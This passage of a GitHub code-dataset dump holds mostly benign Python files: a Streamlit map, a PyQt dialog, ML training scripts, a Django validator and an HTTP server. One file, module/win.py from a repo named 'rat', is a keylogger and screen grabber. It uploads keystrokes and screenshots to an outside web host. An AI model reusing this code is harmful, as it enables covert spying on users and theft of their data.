71.1924,\n 75.3412,\n ],\n \"col3\": np.random.randn(10) * 10000,\n \"col4\": np.random.rand(10, 4).tolist(),\n }\n)\n\nst.map(df5, latitude=\"col1\", longitude=\"col2\", size=\"col3\", color=\"col4\")\n\n# gender = st.sidebar.multiselect(\n# \"Select the Gender:\",\n# options=df[\"Gender\"].unique(),\n# default=df[\"Gender\"].unique()\n# )\n# payment = st.sidebar.multiselect(\n# \"Select the Payment\",\n# options=df[\"Payment\"].unique(),\n# default=df[\"Payment\"].unique()\n# )\n# branch = st.sidebar.multiselect(\n# \"Select the Branch\",\n# options=df[\"Branch\"].unique(),\n# default=df[\"Branch\"].unique()\n# )\n\ndf_selection = df.query(\"Location == @location & Sector==@sector \")\n\n# Check if the dataframe is empty:\nif df_selection.empty:\n st.warning(\"No data available based on the current filter settings!\")\n st.stop() # This will halt the app from further execution.\n","repo_name":"Madhyam123/DataHack_2.0_PS-1_WAR_WITH_CODE","sub_path":"main1.py","file_name":"main1.py","file_ext":"py","file_size_in_byte":10712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36994315428","text":"from .ui.uiQuestionReviewDialog import Ui_QuestionReviewDialog\nfrom PyQt5.QtWidgets import QDialog, QHeaderView\nfrom PyQt5.QtCore import QSortFilterProxyModel\n\nclass QuestionReviewDialog(QDialog):\n def __init__(self, model):\n super().__init__()\n\n self.ui = Ui_QuestionReviewDialog()\n self.ui.setupUi(self)\n\n self.ui.questions.header().setSectionResizeMode(\n QHeaderView.ResizeToContents)\n self.ui.questions.setModel(model)\n self.ui.questions.selectionModel().selectionChanged.connect(self.select)\n self.ui.questions.hideColumn(0)\n self.ui.questions.hideColumn(1)\n self.ui.questions.hideColumn(2)\n self.ui.questions.hideColumn(3)\n self.ui.questions.hideColumn(4)\n\n self.ui.questions.header().setSectionResizeMode(\n QHeaderView.ResizeToContents)\n\n def select(self, selected, deslected):\n if len(selected.indexes()) > 0:\n row = selected.indexes()[0].row()\n model = self.ui.questions.model()\n testid = model.record(row).value(\"TestID\")\n questionid = model.record(row).value(\"QuestionID\")\n column1 = model.record(row).value(\"Column1\")\n value1 = model.record(row).value(\"Value1\")\n column2 = model.record(row).value(\"Column2\")\n correctanswer = model.record(row).value(\"CorrectAnswer\")\n useranswer = model.record(row).value(\"UserAnswer\")\n\n self.ui.labelQuestion.setText(\n \"Values from column {} that have the value {} in column {}:\"\n \"\".format(column2, value1, column1))\n self.ui.correctAnswer.setPlainText(correctanswer)\n self.ui.userAnswer.setPlainText(useranswer)\n","repo_name":"kazkansouh/pyMemorise","sub_path":"memorise/questionReview.py","file_name":"questionReview.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19918181844","text":"\n\n\"\"\"\ntest_performance.py\nUses the benchmark system for the SemEval-2018 Task 3 on Irony detection in\nEnglish tweets. The system makes use of token unigrams as features and outputs\ncross-validated F1-score. Performance of the model when trained with each\ndifferent training set is logged to a file. Adapted from Gilles Jacobs &\nCynthia Van Hee's example.py.\n\"\"\"\n\nimport codecs\nimport logging\nimport os\n\nimport numpy as np\nfrom nltk.tokenize import TweetTokenizer\n\nfrom sklearn import metrics\nfrom sklearn.datasets import dump_svmlight_file\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import cross_val_predict, cross_val_score\nfrom sklearn.svm import LinearSVC\n\nlogging.basicConfig(level=logging.INFO)\nDIR_PATH = os.path.dirname(os.path.realpath(__file__))\n\n\ndef parse_dataset(fp):\n \"\"\"\n Loads the dataset .txt file with label-tweet on each line and parses the dataset.\n :param fp: filepath of dataset\n :return:\n corpus: list of tweet strings of each tweet.\n y: list of labels\n \"\"\"\n y = []\n corpus = []\n with open(fp, 'rt') as data_in:\n for line in data_in:\n if not line.lower().startswith(\"tweet index\"):\n line = line.rstrip()\n label = int(line.split(\"\\t\")[1])\n tweet = line.split(\"\\t\")[2]\n y.append(label)\n corpus.append(tweet)\n\n return corpus, y\n\n\ndef group_predictions(control=False):\n groups = {\n \"emoji\": [],\n \"n-grams\": [],\n \"all\": []\n }\n\n directory = \"predictions\"\n if control:\n del groups[\"emoji\"]\n directory = \"control_predictions\"\n\n for filename in os.listdir(f\"{DIR_PATH}/{directory}/\"):\n split_filename = filename.split(\"_\")\n groups[\"all\"].append(filename)\n\n try:\n element_type = split_filename[3]\n corpus_type = \"_\".join(split_filename[5:-1])\n except:\n continue\n\n if \"emoji\" in element_type:\n groups[\"emoji\"].append(filename)\n else:\n groups[\"n-grams\"].append(filename)\n\n number = element_type.split(\"-\")[0]\n if number in [\"1\", \"2\", \"3\", \"4\"]:\n groups.setdefault(number, [])\n groups[number].append(filename)\n\n if corpus_type:\n groups.setdefault(corpus_type, [])\n groups[corpus_type].append(filename)\n\n return groups\n\n\ndef create_output(groups, control=False):\n training_directory = f\"{DIR_PATH}/../../../datasets/train/\"\n default = [\"predictions_SemEval2018-T3-train-taskA_emoji.txt\",\n \"predictions_SemEval2018-T3-train-taskA_emoji_tokenised.txt\"]\n\n output_directory = \"output\"\n predictions_directory = \"predictions\"\n if control:\n output_directory = \"control_output\"\n predictions_directory = \"control_predictions\"\n\n for key, filenames in groups.items():\n fout = open(f\"{DIR_PATH}/{output_directory}/output_{key}.csv\", \"w+\")\n fout.write(\"Training Set,Accuracy,Precision,Recall,F1\\n\")\n filenames.extend(default)\n\n for filename in set(filenames):\n training_set = filename.replace('predictions_', '')\n _, y = parse_dataset(f\"{training_directory}{training_set}\")\n with open(f\"{DIR_PATH}/{predictions_directory}/{filename}\") as f:\n predictions = [int(prediction) for prediction in f]\n\n # Get performance\n accuracy = metrics.accuracy_score(y, predictions)\n precision = metrics.precision_score(y, predictions, pos_label=1)\n recall = metrics.recall_score(y, predictions, pos_label=1)\n f1_score = metrics.f1_score(y, predictions, pos_label=1)\n\n fout.write(f\"{training_set},{accuracy},{precision},{recall},{f1_score}\\n\")\n\n\nif __name__ == \"__main__\":\n groups = group_predictions()\n create_output(groups)","repo_name":"amosbastian/IronyDetection","sub_path":"models/NIHRIO/src/create_output.py","file_name":"create_output.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33523295382","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Seqeunce Model with Attention for Addition Learning\n# \n# - Use seq-to-seq model to learn mathematical addition based on data\n# - This is based on Chapter 7 of [Deep Learning 2用 Python 進行自然語言處理的基礎理論實作](https://www.tenlong.com.tw/products/9789865020675).\n# - This notebook uses two types of Attention layers:\n# - The first type is the default `keras.layers.Attention` (Luong attention) and `keras.layers.AdditiveAttention` (Bahdanau attention). (But these layers have ONLY been implemented in Tensorflow-nightly.\n# - The second type is developed by Thushan.\n# - Bahdanau Attention Layber developed in [Thushan](https://github.com/thushv89/attention_keras)\n# - Thushan Ganegedara's\n# [Attention in Deep Networks with Keras](https://towardsdatascience.com/light-on-math-ml-attention-with-keras-dc8dbc1fad39)\n\n# In[57]:\n\n\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\n\n# In[58]:\n\n\nimport os\nos.chdir('/content/drive/My Drive/_MySyncDrive/Repository/python-notes/nlp')\n\n\n# In[59]:\n\n\nget_ipython().run_line_magic('pwd', '')\n\n\n# In[60]:\n\n\nget_ipython().system('pip install tf-nightly')\n\n\n# In[61]:\n\n\nimport tensorflow, keras\nprint(tensorflow.__version__)\nprint(keras.__version__)\n\n\n# ## Functions\n\n# In[62]:\n\n\nimport re\nimport keras\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import Model\nfrom keras.layers import Input, LSTM, Dense, GRU\nfrom tensorflow.keras.layers import AdditiveAttention, Attention\nimport numpy as np\nfrom random import randint\nfrom numpy import array\nfrom numpy import argmax\nfrom numpy import array_equal\nfrom keras import Model\nfrom keras.models import Sequential\nfrom keras.layers import LSTM, GRU, Concatenate\nfrom keras.layers import Attention\nfrom keras.layers import Dense\nfrom keras.layers import TimeDistributed\nfrom keras.layers import RepeatVector\nfrom keras import Input\nfrom attention import AttentionLayer\nfrom keras.utils import to_categorical\n\n\n# Path to the data txt file on disk.\ndef get_data(data_path, train_test = 0.9):\n data_path = '../../../RepositoryData/data/deep-learning-2/addition.txt'\n with open(data_path, 'r', encoding='utf-8') as f:\n lines = f.read().split('\\n')\n\n enc_text=[l.split('_')[0] for l in lines]\n dec_text=[l.split('_')[-1].strip() for l in lines]\n\n dec_text = ['_' + sent + '_' for sent in dec_text]\n \n np.random.seed(123)\n inds = np.arange(len(enc_text))\n np.random.shuffle(inds)\n \n train_size = int(round(len(lines)*train_test))\n train_inds = inds[:train_size]\n test_inds = inds[train_size:]\n tr_enc_text = [enc_text[ti] for ti in train_inds]\n tr_dec_text = [dec_text[ti] for ti in train_inds]\n\n ts_enc_text = [enc_text[ti] for ti in test_inds]\n ts_dec_text = [dec_text[ti] for ti in test_inds]\n \n return tr_enc_text, tr_dec_text, ts_enc_text, ts_dec_text\n\n\n## when the max_len is known, use this func to convert text to seq\ndef sents2sequences(tokenizer, sentences, reverse=False, pad_length=None, padding_type='post'):\n encoded_text = tokenizer.texts_to_sequences(sentences)\n preproc_text = pad_sequences(encoded_text, padding=padding_type, maxlen=pad_length)\n if reverse:\n preproc_text = np.flip(preproc_text, axis=1)\n return preproc_text\n\n\n\ndef preprocess_data(enc_tokenizer, dec_tokenizer, enc_text, dec_text):\n enc_seq = enc_tokenizer.texts_to_sequences(tr_enc_text)\n enc_timesteps = np.max([len(l) for l in enc_seq])\n enc_seq = pad_sequences(enc_seq, padding='post', maxlen = enc_timesteps)\n dec_seq = dec_tokenizer.texts_to_sequences(tr_dec_text)\n dec_timesteps = np.max([len(l) for l in dec_seq])\n dec_seq = pad_sequences(dec_seq, padding='post', maxlen = dec_timesteps)\n return enc_seq, dec_seq\n\n\n# In[63]:\n\n\ndef define_nmt(hidden_size, batch_size, enc_timesteps, enc_vsize, dec_timesteps, dec_vsize):\n \"\"\" Defining a NMT model \"\"\"\n\n # Define an input sequence and process it.\n if batch_size:\n encoder_inputs = Input(batch_shape=(batch_size, enc_timesteps, enc_vsize), name='encoder_inputs')\n decoder_inputs = Input(batch_shape=(batch_size, dec_timesteps - 1, dec_vsize), name='decoder_inputs')\n else:\n encoder_inputs = Input(shape=(enc_timesteps, enc_vsize), name='encoder_inputs')\n if fr_timesteps:\n decoder_inputs = Input(shape=(dec_timesteps - 1, dec_vsize), name='decoder_inputs')\n else:\n decoder_inputs = Input(shape=(None, dec_vsize), name='decoder_inputs')\n\n # Encoder GRU\n encoder_gru = GRU(hidden_size, return_sequences=True, return_state=True, name='encoder_gru')\n encoder_out, encoder_state = encoder_gru(encoder_inputs)\n\n # Set up the decoder GRU, using `encoder_states` as initial state.\n decoder_gru = GRU(hidden_size, return_sequences=True, return_state=True, name='decoder_gru')\n decoder_out, decoder_state = decoder_gru(decoder_inputs, initial_state=encoder_state)\n\n # Attention layer\n # attn_layer = AttentionLayer(name='attention_layer')\n attn_layer = AdditiveAttention(name=\"attention_layer\")\n\n ## The input for AdditiveAttention: query, key\n ## It returns a tensor of shape as query\n ## This is different from the AttentionLayer developed by Thushan\n # attn_out, attn_states = attn_layer([encoder_out, decoder_out])\n\n attn_out, attn_states = attn_layer([decoder_out,encoder_out],return_attention_scores=True)\n\n # Concat attention input and decoder GRU output\n decoder_concat_input = Concatenate(axis=-1, name='concat_layer')([decoder_out, attn_out])\n\n # Dense layer\n dense = Dense(dec_vsize, activation='softmax', name='softmax_layer')\n dense_time = TimeDistributed(dense, name='time_distributed_layer')\n decoder_pred = dense_time(decoder_concat_input)\n\n # Full model\n full_model = Model(inputs=[encoder_inputs, decoder_inputs], outputs=decoder_pred)\n full_model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\n full_model.summary()\n\n \"\"\" Inference model \"\"\"\n batch_size = 1\n\n \"\"\" Encoder (Inference) model \"\"\"\n encoder_inf_inputs = Input(batch_shape=(batch_size, enc_timesteps, enc_vsize), name='encoder_inf_inputs')\n encoder_inf_out, encoder_inf_state = encoder_gru(encoder_inf_inputs)\n encoder_model = Model(inputs=encoder_inf_inputs, outputs=[encoder_inf_out, encoder_inf_state])\n\n \"\"\" Decoder (Inference) model \"\"\"\n decoder_inf_inputs = Input(batch_shape=(batch_size, 1, dec_vsize), name='decoder_word_inputs')\n encoder_inf_states = Input(batch_shape=(batch_size, enc_timesteps, hidden_size), name='encoder_inf_states')\n decoder_init_state = Input(batch_shape=(batch_size, hidden_size), name='decoder_init')\n\n decoder_inf_out, decoder_inf_state = decoder_gru(decoder_inf_inputs, initial_state=decoder_init_state)\n # attn_inf_out, attn_inf_states = attn_layer([encoder_inf_states, decoder_inf_out])\n attn_inf_out, attn_inf_states = attn_layer([decoder_inf_out, encoder_inf_states],return_attention_scores=True)\n\n decoder_inf_concat = Concatenate(axis=-1, name='concat')([decoder_inf_out, attn_inf_out])\n decoder_inf_pred = TimeDistributed(dense)(decoder_inf_concat)\n decoder_model = Model(inputs=[encoder_inf_states, decoder_init_state, decoder_inf_inputs],\n outputs=[decoder_inf_pred, attn_inf_states, decoder_inf_state])\n\n return full_model, encoder_model, decoder_model\n\ndef train(full_model, enc_seq, dec_seq, batch_size, n_epochs=10):\n \"\"\" Training the model \"\"\"\n loss_epoch = []\n accuracy_epoch = []\n for ep in range(n_epochs):\n losses = []\n accuracies = []\n for bi in range(0, enc_seq.shape[0] - batch_size, batch_size):\n\n enc_onehot_seq = to_categorical(\n enc_seq[bi:bi + batch_size, :], num_classes=enc_vsize)\n dec_onehot_seq = to_categorical(\n dec_seq[bi:bi + batch_size, :], num_classes=dec_vsize)\n\n full_model.train_on_batch(\n [enc_onehot_seq, dec_onehot_seq[:, :-1, :]], dec_onehot_seq[:, 1:, :])\n\n l,a = full_model.evaluate([enc_onehot_seq, dec_onehot_seq[:, :-1, :]], dec_onehot_seq[:, 1:, :],\n batch_size=batch_size, verbose=0)\n\n losses.append(l)\n accuracies.append(a)\n if (ep + 1) % 1 == 0:\n print(\"Loss/Accuracy in epoch {}: {}/{}\".format(ep + 1, np.mean(losses), np.mean(accuracies)))\n loss_epoch.append(np.mean(losses))\n accuracy_epoch.append(np.mean(accuracies))\n return loss_epoch, accuracy_epoch\n\n\ndef infer_nmt(encoder_model, decoder_model, test_enc_seq, enc_vsize, dec_vsize, dec_timesteps):\n \"\"\"\n Infer logic\n :param encoder_model: keras.Model\n :param decoder_model: keras.Model\n :param test_en_seq: sequence of word ids\n :param en_vsize: int\n :param fr_vsize: int\n :return:\n \"\"\"\n\n test_dec_seq = sents2sequences(dec_tokenizer, ['_'], dec_vsize)\n test_enc_onehot_seq = to_categorical(test_enc_seq, num_classes=enc_vsize)\n test_dec_onehot_seq = np.expand_dims(\n to_categorical(test_dec_seq, num_classes=dec_vsize), 1)\n\n enc_outs, enc_last_state = encoder_model.predict(test_enc_onehot_seq)\n dec_state = enc_last_state\n attention_weights = []\n dec_text = ''\n for i in range(dec_timesteps):\n\n dec_out, attention, dec_state = decoder_model.predict(\n [enc_outs, dec_state, test_dec_onehot_seq])\n dec_ind = np.argmax(dec_out, axis=-1)[0, 0]\n\n if dec_ind == 0:\n break\n test_dec_seq = sents2sequences(\n dec_tokenizer, [dec_index2word[dec_ind]], dec_vsize)\n test_dec_onehot_seq = np.expand_dims(\n to_categorical(test_dec_seq, num_classes=dec_vsize), 1)\n\n attention_weights.append((dec_ind, attention))\n dec_text += dec_index2word[dec_ind]\n\n return dec_text, attention_weights\n\n\n# In[64]:\n\n\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif']=[\"PingFang HK\"]\ndef plot_attention_weights(encoder_inputs, attention_weights, enc_id2word, dec_id2word, filename=None):\n \"\"\"\n Plots attention weights\n :param encoder_inputs: Sequence of word ids (list/numpy.ndarray)\n :param attention_weights: Sequence of (:)\n :param en_id2word: dict\n :param fr_id2word: dict\n :return:\n \"\"\"\n\n if len(attention_weights) == 0:\n print('Your attention weights was empty. No attention map saved to the disk. ' +\n '\\nPlease check if the decoder produced a proper translation')\n return\n\n mats = []\n dec_inputs = []\n for dec_ind, attn in attention_weights:\n mats.append(attn.reshape(-1))\n dec_inputs.append(dec_ind)\n attention_mat = np.transpose(np.array(mats))\n\n fig, ax = plt.subplots(figsize=(32, 32))\n ax.imshow(attention_mat)\n\n ax.set_xticks(np.arange(attention_mat.shape[1]))\n ax.set_yticks(np.arange(attention_mat.shape[0]))\n\n ax.set_xticklabels([dec_id2word[inp] if inp != 0 else \"\" for inp in dec_inputs])\n ax.set_yticklabels([enc_id2word[inp] if inp != 0 else \"\" for inp in encoder_inputs.ravel()])\n\n ax.tick_params(labelsize=32)\n ax.tick_params(axis='x', labelrotation=90)\n\n# if not os.path.exists(config.RESULTS_DIR):\n# os.mkdir(config.RESULTS_DIR)\n# if filename is None:\n# plt.savefig( 'attention.png'))\n# else:\n# plt.savefig(os.path.join(config.RESULTS_DIR, '{}'.format(filename)))\n\n\n# ## Main Program\n\n# ### Data Wrangling and Training\n\n# In[65]:\n\n\n#### hyperparameters\nbatch_size = 128\nhidden_size = 256\nn_epochs = 50\n\n### Get data\ntr_enc_text, tr_dec_text, ts_enc_text, ts_dec_text = get_data(data_path='../../../RepositoryData/data/deep-learning-2/addition.txt')\n\n# \"\"\" Defining tokenizers \"\"\"\nenc_tokenizer = keras.preprocessing.text.Tokenizer(oov_token='UNK', char_level=True)\nenc_tokenizer.fit_on_texts(tr_enc_text)\n\ndec_tokenizer = keras.preprocessing.text.Tokenizer(oov_token='UNK', char_level=True)\ndec_tokenizer.fit_on_texts(tr_dec_text)\n\n# ### Getting sequence integer data\nenc_seq, dec_seq = preprocess_data(enc_tokenizer, dec_tokenizer, tr_enc_text, tr_dec_text)\n\n# ### timestesps\nenc_timesteps = enc_seq.shape[1]\ndec_timesteps = dec_seq.shape[1]\n\n# ### vocab size\nenc_vsize = max(enc_tokenizer.index_word.keys()) + 1\ndec_vsize = max(dec_tokenizer.index_word.keys()) + 1\n\n\n\n\n\n\n# In[66]:\n\n\nprint(enc_vsize)\nprint(dec_vsize)\nprint(tr_enc_text[:5])\nprint(tr_dec_text[:5])\n\n\n# In[67]:\n\n\n###\"\"\" Defining the full model \"\"\"\nfull_model, infer_enc_model, infer_dec_model = define_nmt(\n hidden_size=hidden_size,\n batch_size=batch_size,\n enc_timesteps=enc_timesteps,\n dec_timesteps=dec_timesteps,\n enc_vsize=enc_vsize,\n dec_vsize=dec_vsize)\n\n\n# In[68]:\n\n\nfrom keras.utils import plot_model\nplot_model(full_model, show_shapes=True)\n\n\n# In[69]:\n\n\nget_ipython().run_cell_magic('time', '', 'loss, accuracy = train(full_model, enc_seq, dec_seq, batch_size, n_epochs)\\n')\n\n\n# In[70]:\n\n\nplt.style.use('fivethirtyeight')\n\nplt.plot(range(len(loss)), loss, label='loss')\nplt.plot(range(len(accuracy)), accuracy, label='accuracy')\nplt.legend()\nplt.tight_layout()\nplt.show()\n\n\n# ### Model Saving\n\n# In[71]:\n\n\n# full_model.save('../../../RepositoryData/output/seq2seq-attention-addition/full-model.h5')\n# infer_enc_model.save('../../../RepositoryData/output/seq2seq-attention-addition/infer-enc-model.h5')\n# infer_dec_model.save('../../../RepositoryData/output/seq2seq-attention-addition/infer-dec-model.h5')\n\n\n# ### Prediction\n\n# In[ ]:\n\n\nfull_model.load_weights('../../../RepositoryData/output/seq2seq-attention-addition/full-model.h5')\ninfer_enc_model.load_weights('../../../RepositoryData/output/seq2seq-attention-addition/infer-enc-model.h5')\ninfer_dec_model.load_weights('../../../RepositoryData/output/seq2seq-attention-addition/infer-dec-model.h5')\n\n\n# In[72]:\n\n\nplot_model(infer_enc_model,show_shapes=True)\n\n\n# In[73]:\n\n\nplot_model(infer_dec_model, show_shapes=True)\n\n\n# In[74]:\n\n\n\"\"\" Index2word \"\"\"\nenc_index2word = dict(\n zip(enc_tokenizer.word_index.values(), enc_tokenizer.word_index.keys()))\ndec_index2word = dict(\n zip(dec_tokenizer.word_index.values(), dec_tokenizer.word_index.keys()))\n\n\n# In[75]:\n\n\ndef translate(infer_enc_model, infer_dec_model, test_enc_text, \n enc_vsize, dec_vsize, enc_timesteps, dec_timesteps,\n enc_tokenizer, dec_tokenizer):\n \"\"\" Inferring with trained model \"\"\"\n test_enc = test_enc_text\n print('Translating: {}'.format(test_enc))\n\n test_enc_seq = sents2sequences(\n enc_tokenizer, [test_enc], pad_length=enc_timesteps)\n\n test_dec, attn_weights = infer_nmt(\n encoder_model=infer_enc_model, decoder_model=infer_dec_model,\n test_enc_seq=test_enc_seq, enc_vsize=enc_vsize, dec_vsize=dec_vsize, dec_timesteps = dec_timesteps)\n print('\\tFrench: {}'.format(test_dec))\n return test_enc_seq, test_dec, attn_weights\n\n\n# In[76]:\n\n\ntest_enc_seq, test_dec, attn_weights=translate(infer_enc_model=infer_enc_model,\n infer_dec_model=infer_dec_model,\n test_enc_text=ts_enc_text[120],\n enc_vsize=enc_vsize,\n dec_vsize=dec_vsize,\n enc_timesteps=enc_timesteps,\n dec_timesteps=dec_timesteps,\n enc_tokenizer=enc_tokenizer,\n dec_tokenizer=dec_tokenizer)\n\n\n\n# In[77]:\n\n\n\"\"\" Attention plotting \"\"\"\nplot_attention_weights(test_enc_seq, attn_weights,\n enc_index2word, dec_index2word)\n\n\n# In[ ]:\n\n\nprint(tr_enc_text[:5])\nprint(tr_dec_text[:5])\n\n\n\n# ## Evaluation on Test Data\n\n# In[78]:\n\n\ndef test(full_model, ts_enc_text, ts_dec_text, enc_tokenizer, dec_tokenizer, batch_size):\n # ### Getting sequence integer data\n ts_enc_seq, ts_dec_seq = preprocess_data(enc_tokenizer, dec_tokenizer, ts_enc_text, ts_dec_text)\n losses = []\n accuracies = []\n for bi in range(0, ts_enc_seq.shape[0] - batch_size, batch_size):\n enc_onehot_seq = to_categorical(\n ts_enc_seq[bi:bi + batch_size, :], num_classes=enc_vsize)\n dec_onehot_seq = to_categorical(\n ts_dec_seq[bi:bi + batch_size, :], num_classes=dec_vsize)\n\n # full_model.train_on_batch(\n # [enc_onehot_seq, dec_onehot_seq[:, :-1, :]], dec_onehot_seq[:, 1:, :])\n l,a = full_model.evaluate([enc_onehot_seq, dec_onehot_seq[:, :-1, :]], dec_onehot_seq[:, 1:, :],\n batch_size=batch_size, verbose=0)\n losses.append(l)\n accuracies.append(a)\n print('Average Loss:{}'.format(np.mean(losses)))\n print('Average Accuracy:{}'.format(np.mean(accuracies)))\n\ntest(full_model, ts_enc_text = ts_enc_text, ts_dec_text = ts_dec_text, \n enc_tokenizer = enc_tokenizer, dec_tokenizer = dec_tokenizer, batch_size = batch_size)\n\n","repo_name":"alvinntnu/python-notes","sub_path":"_build/jupyter_execute/nlp/seq-to-seq-attention-addition.py","file_name":"seq-to-seq-attention-addition.py","file_ext":"py","file_size_in_byte":16860,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"37709239418","text":"import numpy as np\n\nclass Network(object):\n def __init__(self):\n self.inputLayerSize = 2\n self.outputLayerSize = 1\n self.hiddenLayerSize = 3\n\n self.W1 = np.random.rand(self.inputLayerSize, self.hiddenLayerSize)\n self.W2 = np.random.rand(self.hiddenLayerSize, self.outputLayerSize)\n\n def forward(self, x):\n self.z2 = np.dot(x, self.W1)\n self.a2 = self.sigmoid(self.z2)\n self.z3 = np.dot(self.a2, self.W2)\n yHat = self.sigmoid(self.z3)\n return yHat\n\n def sigmoid(self, z):\n return 1 / (1 + np.exp(-z));\n\n\nif __name__ == \"__main__\":\n x = np.array(([3, 5], [5, 1], [10, 2]), dtype=float)\n NN = Network()\n yHat = NN.forward(x)\n print(yHat)\n","repo_name":"kamzab95/NeuralNetwork","sub_path":"Neural.py","file_name":"Neural.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26885919379","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.special import expit\nimport process_depracated as process\n\n# np.set_printoptions(threshold=np.inf)\n\n# get data\nX, T = process.process()\nN = len(X)\nD_X = X.shape[1]\nNUM_EMOTIONS = len(process.EMOTIONS)\n\n# multinomial logistic regression\n\n# STEP1: one-hot encode dependant variable\nzeros = np.zeros((N, 1), dtype=int)\nfor i in range(NUM_EMOTIONS):\n T = np.concatenate((T, zeros), axis=1)\nD_T = T.shape[1]\n\nfor row in range(N):\n emotion = T[row, 0]\n T[row, emotion + 1] = 1\n\n# remove emotion column now that it has been encoded\n# the last encoded (Neutral-6) becomes our reference variable\nT = np.delete(T, [0, NUM_EMOTIONS], axis=1)\n\n\ndef sanity_check_one_hot_encoding():\n r = np.random.random_integers(0, N - 1)\n print('Emotion value', get_emotion(r))\n for i in range(len(T[r])):\n if T[r, i] == 1:\n print('Emotion index (should match value):', i)\n print('Emotion name', process.EMOTIONS[get_emotion(r)])\n process.show_image(X[r].tolist())\n\n\ndef get_emotion(row_index):\n row = T[row_index]\n for i in range(T.shape[1]):\n if row[i] == 1:\n return i\n return NUM_EMOTIONS - 1\n\n\nsanity_check_one_hot_encoding()\n\n# STEP2: Create NUM_EMOTIONS -1 logistic regression models\n\n\n# TODO: all of these methods need to be modded to accept one specific column of T\n# so we can have one model per column\n''' T_old = [1\n 0\n 0\n 0\n ...]\n T_new = [1, 0, 0, ...]\n [0, 1, 0, ...]\n [...]\n'''\n\n\ndef classification_rate(T, P):\n return np.mean(T == P)\n\n\ndef calculate_cross_entropy(T, Y):\n E = 0\n for i in range(N):\n if T[i] == 1:\n E -= np.log(Y[i])\n else:\n E -= np.log(1 - Y[i])\n return E\n\n\n# bias term\nones = np.ones((N, 1))\nX = np.concatenate((X, ones), axis=1)\n\nT_index = 0\n\n# random weights\nw = np.random.randn(D_X + 1)\nb = 0\n\nY = expit(X.dot(w) + b)\n\nlearning_rate = 0.000000001\nerrors = []\nfor t in range(10000):\n cost = calculate_cross_entropy(T[:, T_index], Y)\n if (t % 100 == 0):\n print('Cost:', cost)\n errors.append(cost)\n\n w += learning_rate * ((X.T.dot(T[:, T_index] - Y)))\n b -= learning_rate * (Y - T[:, T_index]).sum()\n\n Y = expit(X.dot(w) + b)\n \n\nplt.plot(errors)\nplt.title('Cross-entroy per iteration')\nplt.show()\n\nprint('Final w', w)\nprint('Classification rate', classification_rate(T[T_index], np.round(Y)))\n","repo_name":"mattemoore/DeepLearning","sub_path":"facial_recognition/code/logistic_regression_depracated.py","file_name":"logistic_regression_depracated.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35806327909","text":"import os\n\nfrom django.core.exceptions import ValidationError\n\ndef allow_only_validator(value):\n extention = os.path.splitext(value.name)[1]\n valid_extention = ['.png', '.jpg', '.jpeg']\n\n if not extention.lower() in valid_extention:\n raise ValidationError('Unsupported file extention. Allow extentions: ' + str(valid_extention))\n","repo_name":"namuetn/Django-Restaurant","sub_path":"accounts/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2586955826","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport requests\nimport struct, uuid\nfrom pyautogui import *\nfrom datetime import datetime\nfrom pynput.keyboard import Key, Listener\n\ndef get_addr():\n\treturn ''.join([hex(fragment)[2:].zfill(2) for fragment in struct.unpack(\"BBBBBB\", struct.pack(\"!Q\", uuid.getnode())[2:])])\n\ndef win_click(direction, flag, x, y):\n\tx = int(x)\n\ty = int(y)\n\tif flag:\n\t\tclick(x, y, 2, 0, direction)\n\telse:\n\t\tclick(x, y, 1, 0, direction)\n\ndef win_capture():\n\tfile_name = ''\n\turl = 'http://www.r41n.shop/storage.cgi'\n\tscreenshot('./cap.png')\n\twith open('./cap.png', 'rb') as f:\n\t\tfile_name=get_addr()+datetime.now().strftime(\"%Y_%m_%d_%H_%M_%S\")+'.png'\n\t\tdata = {'upload_file': f, 'file_name': file_name}\n\t\tres = requests.post(url, files=data)\n\tos.remove('./cap.png')\n\tif res.text == 'success\\n':\n\t\treturn False, file_name\n\telse:\n\t\treturn True, None\n\ndef on_press(key):\n\ttry:\n\t\tc = key.char\n\t\twith open('./' + get_addr() + '.txt', 'a') as f:\n\t\t\tf.write(c)\n\texcept:\n\t\tpass\n\ndef on_release(key):\n\tpass\n\ndef get_keyLog():\n\twith open('./' + get_addr() + '.txt', 'r') as f:\n\t\treturn f.read()\n\ndef post_keyLog():\n\turl = 'http://www.r41n.shop/key_logger.cgi'\n\twith open('./' + get_addr() + '.txt', 'rb') as f:\n\t\tdata = {'upload_file': f, 'file_name': get_addr()+'.txt'}\n\t\tres = requests.post(url, files=data)\n\tif res.text == 'success\\n':\n\t\treturn False\n\telse:\n\t\treturn True\n","repo_name":"phoe6/rat","sub_path":"module/win.py","file_name":"win.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"75082961475","text":"import http.server\nimport socketserver\n\nHOST = \"192.168.1.103\"\nPORT = 80\nDIRECTORY = \"books\"\n\n\nclass Handler(http.server.SimpleHTTPRequestHandler):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, directory=DIRECTORY, **kwargs)\n\n\nwith socketserver.TCPServer((HOST, PORT), Handler) as httpd:\n print(f\"Serving books at 